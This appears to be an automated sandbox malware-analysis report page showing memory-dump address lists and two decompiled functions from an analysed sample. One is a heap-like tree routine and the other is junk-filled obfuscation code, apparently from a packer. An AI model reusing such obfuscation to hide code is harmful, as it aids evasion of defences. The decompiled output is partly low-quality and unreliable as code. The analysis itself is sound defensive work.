                            0x00b25991
                            0x00b25991
                            0x00000000
                            0x00b2595d
                            0x00b2595d
                            0x00b25963
                            0x00b25965
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00b25967
                            0x00b25967
                            0x00b2596b
                            0x00b2596d
                            0x00000000
                            0x00000000
                            0x00b2596f
                            0x00b25971
                            0x00b25971
                            0x00b25974
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00b25974
                            0x00000000
                            0x00b25967
                            0x00b2595b
                            0x00b25942
                            0x00b25863
                            0x00ae2143
                            0x00ae2143
                            0x00ae2149
                            0x00ae214f
                            0x00ae22f1
                            0x00ae22f6
                            0x00000000
                            0x00ae2173
                            0x00ae2173
                            0x00ae217d
                            0x00ae2181
                            0x00ae2186
                            0x00b259ae
                            0x00b259b2
                            0x00b259b5
                            0x00b259b7
                            0x00b259ba
                            0x00b259cd
                            0x00b259d1
                            0x00b259d5
                            0x00b259d9
                            0x00b259db
                            0x00000000
                            0x00000000
                            0x00b259dd
                            0x00b259dd
                            0x00b259e1
                            0x00b259e4
                            0x00b259e7
                            0x00b259ee
                            0x00b259ee
                            0x00b259f3
                            0x00b259f3
                            0x00000000
                            0x00ae2186
                            0x00ae214f
                            0x00ae2106
                            0x00ae2266
                            0x00ae20d8
                            0x00ae20da
                            0x00ae20e0
                            0x00000000
                            0x00000000
                            0x00000000

                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 042350208a196cdbd36634787c7daa400329cd68f15f70ead515571d9d199b99
                            • Instruction ID: d97c6bbe72d1175eb16b6a5637ce2052e87a2bfe479367808dad56fc095e0f06
                            • Opcode Fuzzy Hash: 042350208a196cdbd36634787c7daa400329cd68f15f70ead515571d9d199b99
                            • Instruction Fuzzy Hash: 45F12371A087919FDB35CF29C84176AB7E9EF95320F18866DF9998B290D734DC40CB82
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00ACB090, Relevance: .4, Instructions: 405COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 99%
                            			E00ACB090(signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _t117;
				signed int _t119;
				signed int _t120;
				signed int _t121;
				signed int _t122;
				signed int _t123;
				signed int _t126;
				signed int _t134;
				signed int _t139;
				signed char _t143;
				signed int _t144;
				signed int _t146;
				signed int _t148;
				signed int* _t150;
				signed int _t152;
				signed int _t161;
				signed char _t165;
				signed int _t167;
				signed int _t170;
				signed int _t174;
				signed char _t177;
				signed int _t178;
				signed int _t181;
				signed int _t182;
				signed int _t187;
				signed int _t190;
				signed int _t192;
				signed int _t194;
				signed int _t196;
				signed int _t199;
				signed int _t202;
				signed int _t208;
				signed int _t211;

				_t182 = _a16;
				_t178 = _a8;
				_t161 = _a4;
				 *_t182 = 0;
				 *(_t182 + 4) = 0;
				_t5 = _t161 + 4; // 0x4
				_t117 =  *_t5 & 0x00000001;
				if(_t178 == 0) {
					 *_t161 = _t182;
					 *(_t161 + 4) = _t182;
					if(_t117 != 0) {
						_t117 = _t182 | 0x00000001;
						 *(_t161 + 4) = _t117;
					}
					 *(_t182 + 8) = 0;
					goto L43;
				} else {
					_t208 = _t182 ^ _t178;
					_t192 = _t208;
					if(_t117 == 0) {
						_t192 = _t182;
					}
					_t117 = _a12 & 0x000000ff;
					 *(_t178 + _t117 * 4) = _t192;
					if(( *(_t161 + 4) & 0x00000001) == 0) {
						_t208 = _t178;
					}
					 *(_t182 + 8) = _t208 | 0x00000001;
					if(_a12 == 0) {
						_t14 = _t161 + 4; // 0x4
						_t177 =  *_t14;
						_t117 = _t177 & 0xfffffffe;
						if(_t178 == _t117) {
							_t117 = _a4;
							 *(_t117 + 4) = _t182;
							if((_t177 & 0x00000001) != 0) {
								_t161 = _a4;
								_t117 = _t182 | 0x00000001;
								 *(_t161 + 4) = _t117;
							} else {
								_t161 = _t117;
							}
						} else {
							_t161 = _a4;
						}
					}
					if(( *(_t178 + 8) & 0x00000001) == 0) {
						L42:
						L43:
						return _t117;
					} else {
						_t19 = _t161 + 4; // 0x4
						_t165 =  *_t19 & 0x00000001;
						do {
							_t211 =  *(_t178 + 8) & 0xfffffffc;
							if(_t165 != 0) {
								if(_t211 != 0) {
									_t211 = _t211 ^ _t178;
								}
							}
							_t119 =  *_t211;
							if(_t165 != 0) {
								if(_t119 != 0) {
									_t119 = _t119 ^ _t211;
								}
							}
							_t120 = 0;
							_t121 = _t120 & 0xffffff00 | _t119 != _t178;
							_v8 = _t121;
							_t122 = _t121 ^ 0x00000001;
							_v16 = _t122;
							_t123 =  *(_t211 + _t122 * 4);
							if(_t165 != 0) {
								if(_t123 == 0) {
									goto L20;
								}
								_t123 = _t123 ^ _t211;
								goto L13;
							} else {
								L13:
								if(_t123 == 0 || ( *(_t123 + 8) & 0x00000001) == 0) {
									L20:
									_t194 = _v16;
									if((_a12 & 0x000000ff) != _v8) {
										_t126 =  *(_t182 + 8) & 0xfffffffc;
										_t167 = _t165 & 1;
										_v12 = _t167;
										if(_t167 != 0) {
											if(_t126 != 0) {
												_t126 = _t126 ^ _t182;
											}
										}
										if(_t126 != _t178) {
											L83:
											_t178 = 0x1d;
											asm("int 0x29");
											goto L84;
										} else {
											_t126 =  *(_t178 + _t194 * 4);
											if(_t167 != 0) {
												if(_t126 != 0) {
													_t126 = _t126 ^ _t178;
												}
											}
											if(_t126 != _t182) {
												goto L83;
											} else {
												_t126 =  *(_t211 + _v8 * 4);
												if(_t167 != 0) {
													if(_t126 != 0) {
														_t126 = _t126 ^ _t211;
													}
												}
												if(_t126 != _t178) {
													goto L83;
												} else {
													_t77 = _t178 + 8; // 0x8
													_t150 = _t77;
													_v20 = _t150;
													_t126 =  *_t150 & 0xfffffffc;
													if(_t167 != 0) {
														if(_t126 != 0) {
															_t126 = _t126 ^ _t178;
														}
													}
													if(_t126 != _t211) {
														goto L83;
													} else {
														_t202 = _t211 ^ _t182;
														_t152 = _t202;
														if(_t167 == 0) {
															_t152 = _t182;
														}
														 *(_t211 + _v8 * 4) = _t152;
														_t170 = _v12;
														if(_t170 == 0) {
															_t202 = _t211;
														}
														 *(_t182 + 8) =  *(_t182 + 8) & 0x00000003 | _t202;
														_t126 =  *(_t182 + _v8 * 4);
														if(_t170 != 0) {
															if(_t126 == 0) {
																L58:
																if(_t170 != 0) {
																	if(_t126 != 0) {
																		_t126 = _t126 ^ _t178;
																	}
																}
																 *(_t178 + _v16 * 4) = _t126;
																_t199 = _t178 ^ _t182;
																if(_t170 != 0) {
																	_t178 = _t199;
																}
																 *(_t182 + _v8 * 4) = _t178;
																if(_t170 == 0) {
																	_t199 = _t182;
																}
																 *_v20 =  *_v20 & 0x00000003 | _t199;
																_t178 = _t182;
																_t167 =  *((intOrPtr*)(_a4 + 4));
																goto L21;
															}
															_t126 = _t126 ^ _t182;
														}
														if(_t126 != 0) {
															_t167 =  *(_t126 + 8);
															_t194 = _t167 & 0xfffffffc;
															if(_v12 != 0) {
																L84:
																if(_t194 != 0) {
																	_t194 = _t194 ^ _t126;
																}
															}
															if(_t194 != _t182) {
																goto L83;
															}
															if(_v12 != 0) {
																_t196 = _t126 ^ _t178;
															} else {
																_t196 = _t178;
															}
															 *(_t126 + 8) = _t167 & 0x00000003 | _t196;
															_t170 = _v12;
														}
														goto L58;
													}
												}
											}
										}
									}
									L21:
									_t182 = _v8 ^ 0x00000001;
									_t126 =  *(_t178 + 8) & 0xfffffffc;
									_v8 = _t182;
									_t194 = _t167 & 1;
									if(_t194 != 0) {
										if(_t126 != 0) {
											_t126 = _t126 ^ _t178;
										}
									}
									if(_t126 != _t211) {
										goto L83;
									} else {
										_t134 = _t182 ^ 0x00000001;
										_v16 = _t134;
										_t126 =  *(_t211 + _t134 * 4);
										if(_t194 != 0) {
											if(_t126 != 0) {
												_t126 = _t126 ^ _t211;
											}
										}
										if(_t126 != _t178) {
											goto L83;
										} else {
											_t167 = _t211 + 8;
											_t182 =  *_t167 & 0xfffffffc;
											_v20 = _t167;
											if(_t194 != 0) {
												if(_t182 == 0) {
													L80:
													_t126 = _a4;
													if( *_t126 != _t211) {
														goto L83;
													}
													 *_t126 = _t178;
													L34:
													if(_t194 != 0) {
														if(_t182 != 0) {
															_t182 = _t182 ^ _t178;
														}
													}
													 *(_t178 + 8) =  *(_t178 + 8) & 0x00000003 | _t182;
													_t139 =  *((intOrPtr*)(_t178 + _v8 * 4));
													if(_t194 != 0) {
														if(_t139 == 0) {
															goto L37;
														}
														_t126 = _t139 ^ _t178;
														goto L36;
													} else {
														L36:
														if(_t126 != 0) {
															_t167 =  *(_t126 + 8);
															_t182 = _t167 & 0xfffffffc;
															if(_t194 != 0) {
																if(_t182 != 0) {
																	_t182 = _t182 ^ _t126;
																}
															}
															if(_t182 != _t178) {
																goto L83;
															} else {
																if(_t194 != 0) {
																	_t190 = _t126 ^ _t211;
																} else {
																	_t190 = _t211;
																}
																 *(_t126 + 8) = _t167 & 0x00000003 | _t190;
																_t167 = _v20;
																goto L37;
															}
														}
														L37:
														if(_t194 != 0) {
															if(_t139 != 0) {
																_t139 = _t139 ^ _t211;
															}
														}
														 *(_t211 + _v16 * 4) = _t139;
														_t187 = _t211 ^ _t178;
														if(_t194 != 0) {
															_t211 = _t187;
														}
														 *(_t178 + _v8 * 4) = _t211;
														if(_t194 == 0) {
															_t187 = _t178;
														}
														_t143 =  *_t167 & 0x00000003 | _t187;
														 *_t167 = _t143;
														_t117 = _t143 | 0x00000001;
														 *_t167 = _t117;
														 *(_t178 + 8) =  *(_t178 + 8) & 0x000000fe;
														goto L42;
													}
												}
												_t182 = _t182 ^ _t211;
											}
											if(_t182 == 0) {
												goto L80;
											}
											_t144 =  *(_t182 + 4);
											if(_t194 != 0) {
												if(_t144 != 0) {
													_t144 = _t144 ^ _t182;
												}
											}
											if(_t144 == _t211) {
												if(_t194 != 0) {
													_t146 = _t182 ^ _t178;
												} else {
													_t146 = _t178;
												}
												 *(_t182 + 4) = _t146;
												goto L34;
											} else {
												_t126 =  *_t182;
												if(_t194 != 0) {
													if(_t126 != 0) {
														_t126 = _t126 ^ _t182;
													}
												}
												if(_t126 != _t211) {
													goto L83;
												} else {
													if(_t194 != 0) {
														_t148 = _t182 ^ _t178;
													} else {
														_t148 = _t178;
													}
													 *_t182 = _t148;
													goto L34;
												}
											}
										}
									}
								} else {
									 *(_t178 + 8) =  *(_t178 + 8) & 0x000000fe;
									_t182 = _t211;
									 *(_t123 + 8) =  *(_t123 + 8) & 0x000000fe;
									_t174 = _a4;
									_t117 =  *(_t211 + 8);
									_t181 = _t117 & 0xfffffffc;
									if(( *(_t174 + 4) & 0x00000001) != 0) {
										if(_t181 == 0) {
											goto L42;
										}
										_t178 = _t181 ^ _t211;
									}
									if(_t178 == 0) {
										goto L42;
									}
									goto L17;
								}
							}
							L17:
							 *(_t211 + 8) = _t117 | 0x00000001;
							_t40 = _t174 + 4; // 0x4
							_t117 =  *_t178;
							_t165 =  *_t40 & 0x00000001;
							if(_t165 != 0) {
								if(_t117 != 0) {
									_t117 = _t117 ^ _t178;
								}
							}
							_a12 = _t211 != _t117;
						} while (( *(_t178 + 8) & 0x00000001) != 0);
						goto L42;
					}
				}
			}








































                            0x00acb095
                            0x00acb09b
                            0x00acb09f
                            0x00acb0a5
                            0x00acb0a7
                            0x00acb0aa
                            0x00acb0ad
                            0x00acb0b1
                            0x00acb3f8
                            0x00acb3fa
                            0x00acb3ff
                            0x00acb419
                            0x00acb41b
                            0x00acb41b
                            0x00acb401
                            0x00000000
                            0x00acb0b7
                            0x00acb0b9
                            0x00acb0bc
                            0x00acb0c0
                            0x00acb0c2
                            0x00acb0c2
                            0x00acb0c4
                            0x00acb0c8
                            0x00acb0cf
                            0x00acb0d1
                            0x00acb0d1
                            0x00acb0da
                            0x00acb0dd
                            0x00acb0df
                            0x00acb0df
                            0x00acb0e4
                            0x00acb0e9
                            0x00acb3e2
                            0x00acb3e5
                            0x00acb3eb
                            0x00b1a676
                            0x00b1a67b
                            0x00b1a67d
                            0x00acb3f1
                            0x00acb3f1
                            0x00acb3f1
                            0x00acb0ef
                            0x00acb0ef
                            0x00acb0ef
                            0x00acb0e9
                            0x00acb0f6
                            0x00acb28d
                            0x00acb28e
                            0x00acb293
                            0x00acb0fc
                            0x00acb0fc
                            0x00acb101
                            0x00acb104
                            0x00acb107
                            0x00acb10c
                            0x00b1a687
                            0x00b1a68d
                            0x00b1a68d
                            0x00b1a687
                            0x00acb112
                            0x00acb116
                            0x00b1a696
                            0x00b1a69c
                            0x00b1a69c
                            0x00b1a696
                            0x00acb120
                            0x00acb121
                            0x00acb124
                            0x00acb127
                            0x00acb12a
                            0x00acb12d
                            0x00acb132
                            0x00b1a6a5
                            0x00000000
                            0x00000000
                            0x00b1a6ab
                            0x00000000
                            0x00acb138
                            0x00acb138
                            0x00acb13a
                            0x00acb193
                            0x00acb197
                            0x00acb19d
                            0x00acb29c
                            0x00acb29f
                            0x00acb2a2
                            0x00acb2a7
                            0x00b1a6d2
                            0x00b1a6d8
                            0x00b1a6d8
                            0x00b1a6d2
                            0x00acb2af
                            0x00acb420
                            0x00acb422
                            0x00acb423
                            0x00000000
                            0x00acb2b5
                            0x00acb2b5
                            0x00acb2ba
                            0x00b1a6e1
                            0x00b1a6e7
                            0x00b1a6e7
                            0x00b1a6e1
                            0x00acb2c2
                            0x00000000
                            0x00acb2c8
                            0x00acb2cb
                            0x00acb2d0
                            0x00b1a6f0
                            0x00b1a6f6
                            0x00b1a6f6
                            0x00b1a6f0
                            0x00acb2d8
                            0x00000000
                            0x00acb2de
                            0x00acb2de
                            0x00acb2de
                            0x00acb2e1
                            0x00acb2e6
                            0x00acb2eb
                            0x00b1a6ff
                            0x00b1a705
                            0x00b1a705
                            0x00b1a6ff
                            0x00acb2f3
                            0x00000000
                            0x00acb2f9
                            0x00acb2fb
                            0x00acb2fd
                            0x00acb301
                            0x00acb303
                            0x00acb303
                            0x00acb308
                            0x00acb30b
                            0x00acb310
                            0x00acb312
                            0x00acb312
                            0x00acb31c
                            0x00acb322
                            0x00acb327
                            0x00b1a70e
                            0x00acb335
                            0x00acb337
                            0x00b1a71d
                            0x00b1a723
                            0x00b1a723
                            0x00b1a71d
                            0x00acb340
                            0x00acb345
                            0x00acb349
                            0x00b1a72a
                            0x00b1a72a
                            0x00acb352
                            0x00acb357
                            0x00acb359
                            0x00acb359
                            0x00acb365
                            0x00acb367
                            0x00acb36c
                            0x00000000
                            0x00acb36c
                            0x00b1a714
                            0x00b1a714
                            0x00acb32f
                            0x00acb3b8
                            0x00acb3bd
                            0x00acb3c4
                            0x00acb425
                            0x00acb427
                            0x00acb429
                            0x00acb429
                            0x00acb427
                            0x00acb3c8
                            0x00000000
                            0x00000000
                            0x00acb3ce
                            0x00acb42f
                            0x00acb3d0
                            0x00acb3d0
                            0x00acb3d0
                            0x00acb3d7
                            0x00acb3da
                            0x00acb3da
                            0x00000000
                            0x00acb32f
                            0x00acb2f3
                            0x00acb2d8
                            0x00acb2c2
                            0x00acb2af
                            0x00acb1a3
                            0x00acb1a9
                            0x00acb1af
                            0x00acb1b2
                            0x00acb1b5
                            0x00acb1b8
                            0x00b1a733
                            0x00b1a739
                            0x00b1a739
                            0x00b1a733
                            0x00acb1c0
                            0x00000000
                            0x00acb1c6
                            0x00acb1c8
                            0x00acb1cb
                            0x00acb1ce
                            0x00acb1d3
                            0x00b1a742
                            0x00b1a748
                            0x00b1a748
                            0x00b1a742
                            0x00acb1db
                            0x00000000
                            0x00acb1e1
                            0x00acb1e1
                            0x00acb1e6
                            0x00acb1e9
                            0x00acb1ee
                            0x00b1a751
                            0x00acb409
                            0x00acb409
                            0x00acb40e
                            0x00000000
                            0x00000000
                            0x00acb410
                            0x00acb22d
                            0x00acb22f
                            0x00b1a790
                            0x00b1a796
                            0x00b1a796
                            0x00b1a790
                            0x00acb23d
                            0x00acb243
                            0x00acb248
                            0x00b1a79f
                            0x00000000
                            0x00000000
                            0x00b1a7a5
                            0x00000000
                            0x00acb24e
                            0x00acb24e
                            0x00acb250
                            0x00acb374
                            0x00acb379
                            0x00acb37e
                            0x00b1a7ae
                            0x00b1a7b4
                            0x00b1a7b4
                            0x00b1a7ae
                            0x00acb386
                            0x00000000
                            0x00acb38c
                            0x00acb38e
                            0x00b1a7bd
                            0x00acb394
                            0x00acb394
                            0x00acb394
                            0x00acb39b
                            0x00acb39e
                            0x00000000
                            0x00acb39e
                            0x00acb386
                            0x00acb256
                            0x00acb258
                            0x00b1a7c6
                            0x00b1a7cc
                            0x00b1a7cc
                            0x00b1a7c6
                            0x00acb261
                            0x00acb266
                            0x00acb26a
                            0x00b1a7d3
                            0x00b1a7d3
                            0x00acb273
                            0x00acb278
                            0x00acb27a
                            0x00acb27a
                            0x00acb281
                            0x00acb283
                            0x00acb285
                            0x00acb287
                            0x00acb289
                            0x00000000
                            0x00acb289
                            0x00acb248
                            0x00b1a757
                            0x00b1a757
                            0x00acb1f6
                            0x00000000
                            0x00000000
                            0x00acb1fc
                            0x00acb201
                            0x00b1a760
                            0x00b1a766
                            0x00b1a766
                            0x00b1a760
                            0x00acb209
                            0x00acb3a8
                            0x00b1a76f
                            0x00acb3ae
                            0x00acb3ae
                            0x00acb3ae
                            0x00acb3b0
                            0x00000000
                            0x00acb20f
                            0x00acb20f
                            0x00acb213
                            0x00b1a778
                            0x00b1a77e
                            0x00b1a77e
                            0x00b1a778
                            0x00acb21b
                            0x00000000
                            0x00acb221
                            0x00acb223
                            0x00b1a787
                            0x00acb229
                            0x00acb229
                            0x00acb229
                            0x00acb22b
                            0x00000000
                            0x00acb22b
                            0x00acb21b
                            0x00acb209
                            0x00acb1db
                            0x00acb142
                            0x00acb142
                            0x00acb146
                            0x00acb148
                            0x00acb14c
                            0x00acb14f
                            0x00acb154
                            0x00acb15b
                            0x00b1a6b4
                            0x00000000
                            0x00000000
                            0x00b1a6ba
                            0x00b1a6ba
                            0x00acb163
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00acb163
                            0x00acb13a
                            0x00acb169
                            0x00acb16b
                            0x00acb16e
                            0x00acb171
                            0x00acb175
                            0x00acb178
                            0x00b1a6c3
                            0x00b1a6c9
                            0x00b1a6c9
                            0x00b1a6c3
                            0x00acb180
                            0x00acb184
                            0x00000000
                            0x00acb104
                            0x00acb0f6

                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0ec6c5e2d367d18b84ee964be1aa1d3b822183ad02e3793e91df51d62079f2cb
                            • Instruction ID: b2eeda1b3c43d5382cf44f26b400eebc50bb022ef0af4b09830e2e1a533c7313
                            • Opcode Fuzzy Hash: 0ec6c5e2d367d18b84ee964be1aa1d3b822183ad02e3793e91df51d62079f2cb
                            • Instruction Fuzzy Hash: 8DD1E1357252568BCB25CF28C582BAAB7F1AF95314F2E81ACDC65CB381E732DC419760
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0041E080, Relevance: .3, Instructions: 266COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 46%
                            			E0041E080(void* __eax, signed int __ecx, void* __edx, signed int __edi, void* __esi) {
				void* _t42;
				signed char _t43;
				signed char _t44;
				signed char _t47;
				signed int _t48;
				void* _t54;
				void* _t60;
				void* _t62;
				intOrPtr _t63;
				signed int _t74;
				signed int _t84;
				signed int _t89;
				signed int _t99;
				signed int _t102;

				_t84 = __edi;
				_t48 = 0xf39ebbe9;
				_t42 = __eax -  *0xdd13f0cf;
				_pop(_t99);
				_pop( *0x5437b021);
				 *0x1d5790d2 =  *0x1d5790d2 & __edx - 0x00000038 +  *0xda31ba2e + 0x8d3a3164;
				 *0xc0bdf39a =  *0xc0bdf39a & _t102;
				_t100 = _t99 ^ 0xb51018ed;
				asm("adc ebx, [0xc5231487]");
				_push(_t42);
				asm("rcr dword [0xb1297ccd], 0x7");
				 *0xfb43a00b =  *0xfb43a00b ^ __ecx;
				asm("sbb ecx, [0x22e90a9f]");
				_t43 = _t42 - 0xc9;
				_push(0xb7b4ff85);
				 *0x6990bae6 =  *0x6990bae6 ^ _t43;
				asm("scasb");
				_t74 =  *0xe54db5bb;
				 *0x2e691124 = __ecx -  *0x7c7af48a;
				asm("sbb esi, 0xa0f47afa");
				asm("sbb esp, [0xca3a7bba]");
				_t95 =  *0x536c621b;
				 *0x145e25fb =  *0x145e25fb << 0xfc;
				 *0x3173dd65 =  *0x3173dd65 ^ _t100;
				asm("rol dword [0xde304935], 0x9a");
				asm("adc esi, [0x7f86c1c5]");
				_t44 =  *0xfffc2710;
				 *0xfffc2710 = _t43;
				asm("adc bh, [0x3ccf3fc9]");
				_t105 =  *0xf670759a & 0x5153a568;
				if(( *0x2e691124 &  *0xed7b1404) <= 0) {
					_push(0x87061d0f);
					 *0x7f7ec0c7 =  *0x7f7ec0c7 - __edx;
					asm("rcr dword [0x78f3619e], 0xea");
					asm("adc ecx, [0xfb266a33]");
					 *0xfb536c61 =  *0xfb536c61 + __edx;
					asm("scasd");
					 *0x89b5506e =  *0x89b5506e - __ebp;
					 *0xd60a6ab5 =  *0xd60a6ab5 + __dh;
					 *0x3e4c6430 =  *0x3e4c6430 >> 0x2e;
					asm("rcl byte [0x102662e6], 0xaa");
					_push( *0xcf52fb64);
					__edx = __edx - 1;
					__ecx = __ecx -  *0xeca94b6e;
					__al = __al &  *0x6ad9a9b1;
					_t40 = __edi;
					__edi =  *0x24d6e13;
					 *0x24d6e13 = _t40;
					__esi = __esi & 0xf76e0bba;
					 *0xd2c44782 =  *0xd2c44782 >> 0x59;
				}
				goto L1;
				do {
					do {
						do {
							do {
								do {
									do {
										do {
											L1:
											_t9 = _t84;
											_t84 =  *0x4e918f09;
											 *0x4e918f09 = _t9;
											_pop(_t60);
											 *0xa66a5a10 =  *0xa66a5a10 >> 0xc0;
											_push(_t74);
											asm("adc eax, 0x980d3a0d");
											_t48 = _t48 +  *0x6f9edab2;
										} while (_t48 != 0);
										asm("rcl dword [0x8868c6f], 0x49");
										asm("rol dword [0x4383061f], 0xf8");
										asm("adc dl, 0xd0");
										 *0x7cb3ff89 =  *0x7cb3ff89 << 0x17;
										asm("ror byte [0x951382f9], 0x55");
										asm("rcl byte [0xbf10edd2], 0xf4");
										asm("cmpsb");
										_push( *0xf9feb0f1);
										_t62 = _t60 -  *0xf499e805 +  *0xf0ff642a;
										asm("rcr dword [0x780d73ee], 0x62");
										_t84 =  *0x70a0469 * 0x0000b50b ^ 0x09b5da6d;
										 *0x1f0f7d81 = (_t105 |  *0x5b0c82cb) &  *0x96659a1d &  *0xda0d7cfd;
										 *0x9df0b83 =  *0x9df0b83 ^ _t100;
										_push(_t74 +  *0xdf0cf91e);
										asm("sbb esp, [0x940a7c33]");
										asm("adc edx, [0xab58bb8]");
										_t95 = _t95 -  *0xf19dedf8;
										_push( *0xb8fb7a64);
										asm("rcr byte [0xda0fb58a], 0xc7");
										asm("adc [0x9ba0a6c0], ebp");
										asm("adc [0x24ca1789], eax");
										_pop(_t105);
										_pop(_t74);
										_t48 = 0x00000012 &  *0x52bdba38;
										asm("adc ecx, [0xc1fd87c1]");
									} while (_t48 <= 0);
									asm("sbb edx, 0x8b51c82f");
									_t95 = _t95 &  *0x24ea04f3;
									asm("rcr dword [0xe62d5507], 0x8c");
									_t100 = 0xd247a42b ^  *0xee6087c7;
									_push(0xe7886bc7);
									asm("sbb [0x2895ebea], esp");
									asm("sbb al, 0x63");
									 *0x1c64d583 =  *0x1c64d583 >> 0xa8;
									asm("sbb [0x4526e43b], esp");
									L1();
									_t63 = _t62 +  *0x47da23c2;
									 *0xf978503d = _t105 +  *0xfde82fed;
									_push( *0x36fd66c2);
									asm("sbb ebp, [0xbbbb159d]");
									_push( *0x34ca6dd5);
									asm("sbb [0xdc425ef8], esi");
									 *0xc0e241f3 = _t84 &  *0x413671e8;
									_t84 =  *0xfefdef33;
									 *0xfefdef33 =  *0xc0e241f3;
									 *0xd127d585 =  *0xd127d585 >> 0x90;
									 *0xe2375439 = _t63;
									_t105 = 0x5ac94fc2;
									_t48 = 0xd93f8d01;
									_pop(_t74);
								} while (0x5ac94fc2 !=  *0x88617);
								 *0x822e4175 =  *0x822e4175 + _t74;
								asm("lodsd");
								asm("ror byte [0x35cb640c], 0xa6");
								_pop(_t74);
							} while (( *0x242ca22f & _t44) <= 0);
							 *0xf1163176 =  *0xf1163176 >> 0x1b;
							 *0x3cdb5896 =  *0x3cdb5896 - _t63;
							 *0x7a405a21 =  *0x7a405a21 >> 0x43;
							_t74 = _t74 ^  *0xdcabb365;
							_t100 = _t100 + 1;
							 *0xe8444198 =  *0xe8444198 - _t63;
							_t95 = 0xa68ca1bf;
							_pop(_t89);
							_t105 = 0x7ac9cfef;
							_t54 = (_t48 & 0x5bf585b9) + 1;
							_t84 = _t89 ^ 0xb3a739dc;
							_push(_t54);
							asm("rol dword [0x94c5221d], 0xa7");
							asm("scasb");
							asm("adc esp, [0x1fdc62be]");
							asm("rcr dword [0xafd20bc5], 0xc2");
							 *0xbd3c891c =  *0xbd3c891c | _t74;
							_t44 =  *0x810e0204 +  *0xb52ca2b | 0x00000063;
							_t48 = _t54 + 0xec51fdc;
						} while (_t48 < 0);
						_t95 = 0xee01c2c1;
						 *0xe8a8eb3f = _t63;
						asm("scasb");
						_t100 = 0x2a90990e;
						asm("sbb ecx, 0xf62c66ba");
						 *0xf0c65ed0 =  *0xf0c65ed0 + _t44;
						 *0x72a60112 =  *0x72a60112 + _t48;
						asm("rcl dword [0x5d1161fb], 0x4f");
						_t48 =  *0xa8ec40e0;
						_t74 = _t74 ^  *0x36a9e570 ^ 0x1358b2f5;
						 *0x128b51bf =  *0x128b51bf ^ 0x5ac94fc2;
						 *0xa7feea09 =  *0xa7feea09 ^ _t74;
					} while ( *0xa7feea09 >= 0);
					 *0xb0fd9171 =  *0xb0fd9171 >> 0xbf;
					asm("adc ecx, [0x8f4689c4]");
					_push(_t44);
					 *0x8878b5f0 =  *0x8878b5f0 >> 0x21;
					 *0x1082ec62 =  *0x1082ec62 - _t74 -  *0xc84575cf;
					asm("adc dl, 0x2c");
					_t47 = _t44 + 1;
					 *0x585c1085 =  *0x585c1085 - 0xee01c2c1;
					_t105 = 0x7ac9cfee;
					_t33 = _t48 +  *0x9a0a0d8b;
					_t48 =  *0xa9e81204;
					 *0xa9e81204 = _t33;
					_push(_t47);
					_push(0xee01c2c1);
					_push( *0x35725789);
					asm("sbb esp, 0xd9c74b8b");
					asm("adc [0xc2f62811], ebp");
					_t95 =  *0xde44259d;
					asm("ror dword [0x917f70ce], 0x96");
					asm("sbb [0x2b1b6cc6], dh");
					 *0x162166d7 =  *0x162166d7 >> 0x95;
					asm("rcl byte [0x214fbe0], 0x35");
					_pop( *0x976486eb);
					_t84 = _t84 -  *0x4958bfce & 0xcba58667;
					 *0x36f78fd9 =  *0x36f78fd9 ^ _t48;
					_t44 = _t47 | 0x000000b3;
					asm("sbb ecx, 0x2a7c4d8b");
					_t100 = 0x2a90990d;
					 *0x1e7fcc2c =  *0x1e7fcc2c & _t44;
					 *0xf56ff2 =  *0xf56ff2 | _t44;
					asm("movsw");
					asm("adc ebx, [0x3309b1ef]");
					_push(0x2a90990e);
					_t74 =  *0xfc6be122;
					asm("ror byte [0x80f25c10], 0xf7");
					asm("rcr dword [0xe2e88afd], 0x1a");
				} while ( *0x35ec85e7 >= _t44);
				return _t44;
			}

















                            0x0041e080
                            0x0041e080
                            0x0041e09c
                            0x0041e0a2
                            0x0041e0a3
                            0x0041e0a9
                            0x0041e0b5
                            0x0041e0bb
                            0x0041e0c1
                            0x0041e0c7
                            0x0041e0d5
                            0x0041e0e2
                            0x0041e0e8
                            0x0041e0ee
                            0x0041e0f0
                            0x0041e0f7
                            0x0041e103
                            0x0041e104
                            0x0041e10a
                            0x0041e110
                            0x0041e116
                            0x0041e11c
                            0x0041e122
                            0x0041e129
                            0x0041e12f
                            0x0041e142
                            0x0041e148
                            0x0041e148
                            0x0041e14e
                            0x0041e15a
                            0x0041e166
                            0x0041e176
                            0x0041e181
                            0x0041e18d
                            0x0041e194
                            0x0041e19a
                            0x0041e1a6
                            0x0041e1a7
                            0x0041e1ad
                            0x0041e1b3
                            0x0041e1c0
                            0x0041e1c7
                            0x0041e1cd
                            0x0041e1ce
                            0x0041e1d4
                            0x0041e1dd
                            0x0041e1dd
                            0x0041e1dd
                            0x0041e1e3
                            0x0041e1e9
                            0x0041e1e9
                            0x00000000
                            0x0041d586
                            0x0041d586
                            0x0041d586
                            0x0041d586
                            0x0041d586
                            0x0041d586
                            0x0041d586
                            0x0041d586
                            0x0041d586
                            0x0041d586
                            0x0041d586
                            0x0041d58c
                            0x0041d58d
                            0x0041d594
                            0x0041d595
                            0x0041d59a
                            0x0041d59a
                            0x0041d5ba
                            0x0041d5c1
                            0x0041d5da
                            0x0041d5e6
                            0x0041d5ed
                            0x0041d60c
                            0x0041d613
                            0x0041d61a
                            0x0041d620
                            0x0041d630
                            0x0041d637
                            0x0041d63d
                            0x0041d643
                            0x0041d649
                            0x0041d650
                            0x0041d660
                            0x0041d666
                            0x0041d66c
                            0x0041d672
                            0x0041d679
                            0x0041d689
